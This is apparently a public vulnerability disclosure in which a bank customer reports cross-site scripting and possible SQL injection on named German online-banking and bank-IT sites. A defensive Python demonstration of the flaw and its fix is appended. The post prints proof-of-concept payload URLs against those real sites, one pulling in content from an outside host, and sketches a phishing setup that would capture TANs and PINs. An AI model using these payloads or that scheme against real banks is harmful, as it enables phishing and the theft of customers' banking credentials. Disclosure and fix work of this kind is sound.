I emailed the administrators 2 months ago - the only response I got was something like:
"We will look into it, but we may or may not change anything on the page - who knows; we won't tell you!".
I called them and the guy on the phone laughed at me.

Here are the links / examples:

*Original:*
https://www.vr-ebanking.de/index.php?RZBK=0280
*MY Version (CSS):*
https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure
/Fälschung (forgery) --> Imitation/

My local bank's website:
http://voba-lindenberg.de/content_suche.php?search=<b>Mysql_Injection?</b>'

The institute that should secure the financial institute's websites:
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10

and so on..

The vr-ebanking site is used by millions of people each day for their daily financial stuff (ebanking) - someone (phishers) could easily use the CSS (Cross Site Scripting) to create real-looking websites "within" the domain; more importantly they could create a website that does all the true login stuff (in the background) but sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql database full of working tans!). This is not looking too good for my bank, but they don't listen -

--
Constantin Hofstetter
http://www.consti.de
Constantin.Hofstetter@gmail.com
mailmespam@gmail.com
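The search URLs in the post reflect the search term back into the page unescaped, so a term like `AA%22%3E<b>...` (`%22%3E` decodes to `">`) closes the attribute it lands in and the rest is rendered as markup. The following is an added example, not code from the post or from any of the sites it names: a hypothetical search page in the same vulnerable shape, the escaped version beside it, and a parser-based probe that shows whether the attacker's `<b>` ends up as a tag or as text. The host in `PAYLOAD_URL` is a placeholder; the payload shape follows the post's fiducia.de URL.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed URL in the shape of the post's fiducia.de example: %22%3E decodes
# to "> and closes the attribute the search term is reflected into. The host
# is a placeholder, not a site named in the post.
PAYLOAD_URL = ("http://search.example.invalid/SearchView"
               "?query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10")


def query_from_url(url: str) -> str:
    """Return the percent-decoded 'query' parameter as the server would see it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("query", [""])[0]


def render_search_vulnerable(query: str) -> str:
    """Hypothetical search page that reflects the raw term into an attribute
    and into a text node, the pattern the post's URLs exploit."""
    return (f'<form><input type="text" name="query" value="{query}"></form>'
            f'<p>No results for {query}</p>')


def render_search_fixed(query: str) -> str:
    """Same page with the term HTML-escaped for both contexts; quote=True also
    turns " into &quot; so the attribute cannot be closed early."""
    safe = html.escape(query, quote=True)
    return (f'<form><input type="text" name="query" value="{safe}"></form>'
            f'<p>No results for {safe}</p>')


class _Probe(HTMLParser):
    """Records the start tags a browser-like parser sees and the input's value."""

    def __init__(self) -> None:
        super().__init__()
        self.input_value = None
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # HTMLParser unescapes entities, so a correctly escaped value
            # comes back as the original search term.
            self.input_value = dict(attrs).get("value")


def probe(page: str):
    """Parse the rendered page and return (input value attribute, start tags).
    If the attacker's <b> shows up among the tags, the term escaped its context."""
    p = _Probe()
    p.feed(page)
    p.close()
    return p.input_value, p.tags


if __name__ == "__main__":
    term = query_from_url(PAYLOAD_URL)
    for name, render in (("vulnerable", render_search_vulnerable),
                         ("fixed", render_search_fixed)):
        value, tags = probe(render(term))
        print(f"{name}: value={value!r} injected_tag={'b' in tags}")
```

In the vulnerable rendering the input's value is truncated to `AA` and the `<b>` arrives as a real tag, which is exactly what a phisher needs to place their own markup (or a script, in a browser that runs it) under the bank's own domain; in the fixed rendering the value round-trips intact and no attacker tag appears. Escaping must match the context the data is written into: `html.escape(..., quote=True)` covers HTML text and double-quoted attributes, but not JavaScript strings or URLs.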